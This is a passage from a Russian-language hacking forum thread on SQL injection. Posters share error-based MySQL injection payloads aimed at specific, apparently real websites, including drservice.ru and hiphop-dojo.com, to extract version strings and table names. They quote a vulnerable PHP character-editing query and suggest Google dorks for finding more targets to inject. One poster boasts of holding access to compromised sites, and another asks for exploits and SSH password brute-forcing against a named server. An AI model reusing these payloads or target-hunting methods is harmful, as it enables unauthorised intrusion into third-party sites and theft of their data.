http://acp.svn.beanstalkapp.com/projects/ACP2/modules/charedit.php PHP: if ($_POST['character'] >= 0) { $c_connect = mysql_connect($c_ip, $c_userdb, $c_pw); mysql_select_db($c_db, $c_connect); mysql_query("SET NAMES '$encoding'"); $res = mysql_query("SELECT `name`, `class`, `guid`, `race`, `online`, `gender`, `level`, `money`, `xp` FROM `characters` WHERE (`guid` = ".$_POST['character'].") and (`account` = ".$_SESSION['user_id'].") and (`online` = 0) LIMIT 1") or trigger_error(mysql_error()); Вот здесь $_POST['character'] character=12589)+and+1=(select+*+from(select+*+from(select+name_const((version()),14)d)+as+t+join+(select+name_const((version()),14)e)b)a)--+
спс большое очень помогло. при запросе PHP: (%53elect+top+1+Post_count+from+Total)-- всегда ответ одинаковый ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. где может быть ошибка
это что за ужас? так низя я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
Ну если не знаешь, то зачем писать? Для тренировки я использую методы по интересней А вообще то у меня уже свалка доступа к сайтам с посещаемостью не 1к уников в сутки)) Просто вопросы я чаще всего решаю сам, чем пишу на форуме, а крутить простые скули типа как ты говоришь inurl:index.php?id=1, не очень интересно. зы. Для меня интерес в выведении допустим того же database(), а не сидеть перебирать таблички и смотреть что в них. Перебирать таблички уже с построенного запроса, это вообще практически ничему не учит. Так что, вот так вот Вот же допустим выводиться.. http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1+1='2/ Почему же не выводиться допустим когда вставляем version или другую подобную функцию. http://www.dr service.ru/service-centers/nn/NNovgorod/drservice52/'and+substr ing(version(),1,1)='5/ Видимо потому что 6 утра и нужно спать)) Бо что-то уже совсем ничего не выводиться )))
да не хрена там не выводится и не будет т.к это бред то что ты пишешь. читай http://forum.antichat.ru/thread19844.html
v1d0qz http://www.drservice.ru/service-centers/nn/NNovgorod/drservice52/'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--'
сорри но там нету решение как в\обойти если не выводится инфо с колонок пример: (%53elect+top+1+Post_count+from+Total)-- всегда ответ одинаковый ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
jokester Так и знал что там можно всё через дупликат красиво оформить. Ой сорри, было очень поздно, на втыке написал) там должно было быть http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1='2/ Вы главное не нервничайте, всё будет хорошо
https://hiphop-dojo.com/order/cart.php?id=939'+and+1=(select+*+from(select+*+from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),14)d)+as+t+join+(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),14)e)b)a)--+
Есть такой сервер: Apache/2.2.2 (ASPLinux) PHP/5.1.2 Не буду вдаваться в заумные слова. Есть ли хорошие дыры в этой вещи? Нормальный сплойтов не нашел(
Не я серьезно. Нужно позарез. Нашел порт, где "возможно" удаленно выполнение команд ssh, и на подбор пароля к ssh2. PS "Возможно" в кавычках не зря((
